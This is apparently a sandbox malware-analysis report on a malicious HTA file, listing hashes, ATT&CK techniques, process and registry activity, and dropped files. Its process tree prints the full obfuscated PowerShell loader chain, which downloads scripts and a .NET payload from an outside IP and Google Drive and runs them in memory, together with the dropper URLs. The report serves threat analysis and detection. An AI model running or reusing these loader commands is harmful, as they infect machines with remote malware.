86f7ef2ea14259c52d1fe1627978ef45a94fc4234c7328a1492da55a400703d6

General

Target

seethebestthignswhichgivingbestthingstogetmakeuveryhappy.hta
Size

131KB
MD5

196fb761aa0f295e150b75bd8ad638b4
SHA1

c209ef825b7f80e43f3c904efbc2df582117eeb0
SHA256

86f7ef2ea14259c52d1fe1627978ef45a94fc4234c7328a1492da55a400703d6
SHA512

38b7eaff75c6d2cc3b5da4ebb6c345247d35d44b29804c67227404942075db9abf6466716122be3cc4bcb7c8188e0aa3c3b69d9459fd1cff8f5177eaae028b85
SSDEEP

96:4vCt7evwlevO+D4xMUrwKtkTt0cZPeIvdDveRAz5hg3vBQ:4vCFUWUiXwK2TpSbBQ

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

poWERSHELl.eXEpowershell.exe

flow pid process

3 2872 poWERSHELl.eXE
6 2884 powershell.exe
8 2884 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2884 powershell.exe
3008 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

poWERSHELl.eXEpowershell.exe

pid process

2872 poWERSHELl.eXE
2744 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

6 drive.google.com
5 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
3	2872	poWERSHELl.eXE
6	2884	powershell.exe
8	2884	powershell.exe

pid	process
2884	powershell.exe
3008	powershell.exe

pid	process
2872	poWERSHELl.eXE
2744	powershell.exe

flow	ioc
6	drive.google.com
5	drive.google.com

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

csc.execvtres.exeWScript.exepowershell.exepowershell.exemshta.exepoWERSHELl.eXEpowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	poWERSHELl.eXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

poWERSHELl.eXEpowershell.exepowershell.exepowershell.exe

pid process

2872 poWERSHELl.eXE
2744 powershell.exe
2872 poWERSHELl.eXE
2872 poWERSHELl.eXE
3008 powershell.exe
2884 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2872	poWERSHELl.eXE
2744	powershell.exe
2872	poWERSHELl.eXE
2872	poWERSHELl.eXE
3008	powershell.exe
2884	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

poWERSHELl.eXEpowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2872	poWERSHELl.eXE
Token: SeDebugPrivilege	2744	powershell.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeDebugPrivilege	2884	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

mshta.exepoWERSHELl.eXEcsc.exeWScript.exepowershell.exe

description	pid	process	target process
PID 2472 wrote to memory of 2872	2472	mshta.exe	poWERSHELl.eXE
PID 2472 wrote to memory of 2872	2472	mshta.exe	poWERSHELl.eXE
PID 2472 wrote to memory of 2872	2472	mshta.exe	poWERSHELl.eXE
PID 2472 wrote to memory of 2872	2472	mshta.exe	poWERSHELl.eXE
PID 2872 wrote to memory of 2744	2872	poWERSHELl.eXE	powershell.exe
PID 2872 wrote to memory of 2744	2872	poWERSHELl.eXE	powershell.exe
PID 2872 wrote to memory of 2744	2872	poWERSHELl.eXE	powershell.exe
PID 2872 wrote to memory of 2744	2872	poWERSHELl.eXE	powershell.exe
PID 2872 wrote to memory of 2752	2872	poWERSHELl.eXE	csc.exe
PID 2872 wrote to memory of 2752	2872	poWERSHELl.eXE	csc.exe
PID 2872 wrote to memory of 2752	2872	poWERSHELl.eXE	csc.exe
PID 2872 wrote to memory of 2752	2872	poWERSHELl.eXE	csc.exe
PID 2752 wrote to memory of 2828	2752	csc.exe	cvtres.exe
PID 2752 wrote to memory of 2828	2752	csc.exe	cvtres.exe
PID 2752 wrote to memory of 2828	2752	csc.exe	cvtres.exe
PID 2752 wrote to memory of 2828	2752	csc.exe	cvtres.exe
PID 2872 wrote to memory of 760	2872	poWERSHELl.eXE	WScript.exe
PID 2872 wrote to memory of 760	2872	poWERSHELl.eXE	WScript.exe
PID 2872 wrote to memory of 760	2872	poWERSHELl.eXE	WScript.exe
PID 2872 wrote to memory of 760	2872	poWERSHELl.eXE	WScript.exe
PID 760 wrote to memory of 3008	760	WScript.exe	powershell.exe
PID 760 wrote to memory of 3008	760	WScript.exe	powershell.exe
PID 760 wrote to memory of 3008	760	WScript.exe	powershell.exe
PID 760 wrote to memory of 3008	760	WScript.exe	powershell.exe
PID 3008 wrote to memory of 2884	3008	powershell.exe	powershell.exe
PID 3008 wrote to memory of 2884	3008	powershell.exe	powershell.exe
PID 3008 wrote to memory of 2884	3008	powershell.exe	powershell.exe
PID 3008 wrote to memory of 2884	3008	powershell.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthignswhichgivingbestthingstogetmakeuveryhappy.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2472
- C:\Windows\SysWOW64\WinDOWSpoWErSheLl\v1.0\poWERSHELl.eXE
  "C:\Windows\systEm32\WinDOWSpoWErSheLl\v1.0\poWERSHELl.eXE" "PoWeRSheLL -EX bYPAsS -nOp -W 1 -c DeVIcECRedenTiAlDEploymeNT.eXe ; iex($(Iex('[SYsTeM.TeXt.ENCODinG]'+[chAR]58+[chAR]58+'UTF8.geTStRING([SysteM.CONVERT]'+[CHAR]0x3a+[cHAr]0X3A+'fRomBaSe64STring('+[ChAr]34+'JEREICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlckRlZkluaXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGR0Vkh5Zm5wRUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVnZ3cXksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNvSVVxaVgsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdm0pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMZkJpeHBhTVFhSiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVVUTURZQ2tkICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRERDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMy9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzdG9oYXBwZW5lZC50SUYiLCIkRW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc3RvaGFwcC52YlMiLDAsMCk7c1RhUlQtc2xFZVAoMyk7U1RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3N0b2hhcHAudmJTIg=='+[CHAr]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2872
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -nOp -W 1 -c DeVIcECRedenTiAlDEploymeNT.eXe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2744
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1jhmi1uz.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2752
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4403.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC43F3.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2828
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\picturewithgreatnewswithgoodthingstohapp.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:760
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnR1ZDaW1hZ2VVcmwnKycgPSBTcHJodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd24nKydsbycrJ2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciBTcHI7R1ZDd2ViQ2xpJysnZW4nKyd0ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHVkNpbWFnZUJ5dGVzID0nKycgR1ZDd2ViQ2xpZW50LkRvd24nKydsb2FkJysnRGF0YScrJyhHVkNpbWFnZVVybCknKyc7R1ZDaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoR1ZDaW1hZycrJ2VCeXRlcyk7R1YnKydDc3RhcnRGbGFnID0gU3ByPDxCQVNFNjRfU1RBUlQ+PlNwcjtHVkNlbmRGbGFnID0gU3ByPCcrJzxCQVNFNjRfRU5EPj5TcHI7R1ZDc3RhcnRJbmRleCA9IEdWQ2ltYWdlVGV4dC5JbicrJ2RleE9mKEdWQ3N0YXJ0RmxhZyk7R1ZDZW5kSW5kZXggPSBHVkNpJysnbWFnZVRleHQuSW5kZXhPZihHVkNlbmRGbGFnKTtHVkNzdGFydEluZGUnKyd4IC1nZSAwIC1hbmQgR1ZDZScrJ25kSW5kZXggLWd0IEdWQ3MnKyd0YXJ0SW5kZXg7R1ZDc3RhcnRJbmRleCArPSBHVkNzdGFydEZsYWcuTGVuZ3RoO0dWQ2Jhc2U2NExlbmd0aCA9IEdWQ2VuZEluZGV4IC0gR1ZDc3RhcicrJ3RJbmRleDtHVkNiYXNlNjRDb21tYW5kID0gR1ZDaW1hZ2VUZXh0JysnLlN1YnN0cmluZycrJyhHVkNzdGFydEluZGV4LCBHVkNiYXNlNjRMZW5ndGgpO0dWQ2Jhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEdWQ2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBUMHggRm9yRWFjaC1PYmplY3QgeyBHJysnVkNfIH0pWy0xLi4tKEdWQ2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07R1ZDYycrJ29tbWFuZEJ5dGVzID0gW1N5cycrJ3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZyhHVkNiYXNlNjRSZXZlcnNlZCk7R1ZDbG9hZGVkQXNzZW1ibHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZScrJ21ibHldOjpMb2FkKEdWQ2NvbW1hbmRCeXRlcyk7R1ZDdmFpJysnTWV0aG9kID0gW2RuJysnbGliLklPLkhvbWVdLkdldE1ldGhvZChTcHJWQUlTcHIpO0dWQ3ZhaU1ldGhvZC5JbnZva2UoR1ZDbnVsbCwgQChTcHJ0eHQuU0dPTEtMLzMyNC81NTEuODcxLjY0Ljg5MS8vOnB0dGhTcHIsIFNwcmRlc2F0aXZhZG9TcHIsIFNwcmRlc2F0aXZhZG9TcHIsIFNwcmRlc2F0aXZhZG9TcHIsIFNwckNhc1BvbFNwciwgUycrJ3ByZGVzYXRpdmFkb1NwciwgU3ByZGUnKydzYXRpJysndmFkb1NwcixTcHJkZXNhdGl2YWRvU3ByLFNwJysncmRlc2F0aScrJ3ZhZG9TcHIsU3ByZGVzYXRpdmFkb1NwcixTcHJkZXNhdGl2YWRvU3ByLFNwcmRlc2F0aXZhZG9TcHIsJysnU3ByMVNwcixTcHJkZXNhdGl2YWRvU3ByKSk7JykgLWNyRVBMQWNFIChbY2hhcl04NCtbY2hhcl00OCtbY2hhcl0xMjApLFtjaGFyXTEyNCAtUkVwbGFjZSAoW2NoYXJdNzErW2NoYXJdODYrW2NoYXJdNjcpLFtjaGFyXTM2ICAtY3JFUExBY0UgKFtjaGFyXTgzK1tjaGFyXTExMitbY2hhcl0xMTQpLFtjaGFyXTM5KSB8IElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3008
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('GVCimageUrl'+' = Sprhttps://drive.google.com/uc?export=down'+'lo'+'ad&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur Spr;GVCwebCli'+'en'+'t = New-Object System.Net.WebClient;GVCimageBytes ='+' GVCwebClient.Down'+'load'+'Data'+'(GVCimageUrl)'+';GVCimageText = [System.Text.Encoding]::UTF8.GetString(GVCimag'+'eBytes);GV'+'CstartFlag = Spr<<BASE64_START>>Spr;GVCendFlag = Spr<'+'<BASE64_END>>Spr;GVCstartIndex = GVCimageText.In'+'dexOf(GVCstartFlag);GVCendIndex = GVCi'+'mageText.IndexOf(GVCendFlag);GVCstartInde'+'x -ge 0 -and GVCe'+'ndIndex -gt GVCs'+'tartIndex;GVCstartIndex += GVCstartFlag.Length;GVCbase64Length = GVCendIndex - GVCstar'+'tIndex;GVCbase64Command = GVCimageText'+'.Substring'+'(GVCstartIndex, GVCbase64Length);GVCbase64Reversed = '+'-join (GVCbase64Command.ToCharArray() T0x ForEach-Object { G'+'VC_ })[-1..-(GVCbase64Command.Length)];GVCc'+'ommandBytes = [Sys'+'t'+'em.Convert]::FromBas'+'e64String(GVCbase64Reversed);GVCloadedAssembly = '+'[System.Reflection.Asse'+'mbly]::Load(GVCcommandBytes);GVCvai'+'Method = [dn'+'lib.IO.Home].GetMethod(SprVAISpr);GVCvaiMethod.Invoke(GVCnull, @(Sprtxt.SGOLKL/324/551.871.64.891//:ptthSpr, SprdesativadoSpr, SprdesativadoSpr, SprdesativadoSpr, SprCasPolSpr, S'+'prdesativadoSpr, Sprde'+'sati'+'vadoSpr,SprdesativadoSpr,Sp'+'rdesati'+'vadoSpr,SprdesativadoSpr,SprdesativadoSpr,SprdesativadoSpr,'+'Spr1Spr,SprdesativadoSpr));') -crEPLAcE ([char]84+[char]48+[char]120),[char]124 -REplace ([char]71+[char]86+[char]67),[char]36 -crEPLAcE ([char]83+[char]112+[char]114),[char]39) | Iex"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1jhmi1uz.dll

Filesize
3KB

MD5
0c5386bbdfc85042c10b3064fe7f9cbd

SHA1
2f6eb66b1a3853710d17c9e1ab504d1837dc5d0e

SHA256
1c84ffa50ceefea726f146517c6982c44992322036a88f9315f202c3070eb587

SHA512
ffaf87409e78e2926cf140d771fa89265d763681645021177f05b1be919c426e4bb86886cbc5282961df939f8c8df69d1909e57b512fa4915a1d667643419edf

Download Submit
C:\Users\Admin\AppData\Local\Temp\1jhmi1uz.pdb

Filesize
7KB

MD5
eae98220796654b55fbfb578f3e0b3b7

SHA1
c0e4319d40c8094cb5ac7d503b3be7aff0b5fca8

SHA256
64560c79433057b3be4f29283a0cfd7edbfe818e84e5160403884f64f8cadd5b

SHA512
299bba40a452dc31d8eaf74c5bebb007ce58fceb11f0a17e5123c1745da7121335b0fd8adf2514f4fa69127d8f67be743040f2bd1c9273d629bbe568e4115fb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4403.tmp

Filesize
1KB

MD5
0226c3634ea4ba9c3fd944375cfa45ed

SHA1
cbf9ae07ee882294425d838abcc3132dedc8ae48

SHA256
381b130bd2e7df039e32f0658112150ef669c46713fba41194b12bcdcd621d4c

SHA512
9f874badf1bcc565ab44599e14ee88d3166aad0a4878486dba8cb722cee9d4699ad9bf81693b98be04642f3d97226c73b77dec94896ee5eeb913dc42b6653e46

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
df6f02cabe81eaeabc6123cfbaac41c8

SHA1
61ead55d3c0d26071551329ff43a01524fc63c50

SHA256
e587b74f84f3712b8153eb38c22b96e82bb9067854c7801e47dc04bc391b1151

SHA512
bf5bb70c8ac231c35773a33b77dc790f38d89139cb27cfd5a3a1ce1a9ff5c0fb52af19945030c29e2c81e96bc79e0a835c6c461d6c8ec2619df6013a6586ed49

Download Submit
C:\Users\Admin\AppData\Roaming\picturewithgreatnewswithgoodthingstohapp.vbS

Filesize
136KB

MD5
e7dde34531d98d4b94175ad3269d5667

SHA1
fa9596b284c756bcf9a14dc5ebc2b84607d398ae

SHA256
1d85e569b13244ff1ef054cec322a314c9880567b511b6ee817068c0dcd5d38b

SHA512
d39505a3951fd19c3809a0640218d39414bfb9efcc0d1c534ee5d9a4d17ddbcf7d3ad40d255a6e8a58d259e7ce61ac9f16e3d55b17d674eadb68997b551b4843

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1jhmi1uz.0.cs

Filesize
462B

MD5
c3b2cac94b16f2aa7b62978b69741a03

SHA1
24b7bd8cf3a07a364bd91c2581a9a67cb25c8e3e

SHA256
a1d1f69141b09c2027c3ecf1b0eeb0b0d2a1ee67ee96436591461acd6f1b9d20

SHA512
3f4ab831992c6ffce0b348f105d13bea0ebdabe992d9d4283ba8671069529acb9e8fa8f3ec227aef6ce7f6180309dea4823b82f9cd78f94e5081f3d748fa0cb7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1jhmi1uz.cmdline

Filesize
309B

MD5
1bc4cff65159687a686e632c620f6536

SHA1
54ad494102a80a1895a8c9d3680dd6dc8957c117

SHA256
6833fa625590e545bcbc61730d544419253f8f32149850a22e6219fbbf925f85

SHA512
4bc6560506e39ae2d81f79a104bfff4307f18b3d6d3fddbf1b923ab6e4948a3ce9dcaf5d6f23eb4f4d83140be69beefc18d2f55ff62315a9eefe984f592923ea

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC43F3.tmp

Filesize
652B

MD5
df89e36de0e93a0835daf99ce1395671

SHA1
e63e50a24a98a8299f684f1833bda3baf25e7d11

SHA256
f4189aa07c8922cd52f65e81b6978ab94f96b603739a2a3b9f1aebb0d5336472

SHA512
17940639413ac61fea0ac167fb48291abc0e64757742b6282bf3276ac860baddd0ed2a59f15106a74a5a602e2a0c705b87475f17a95b97cb78c326b37e0f639f

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads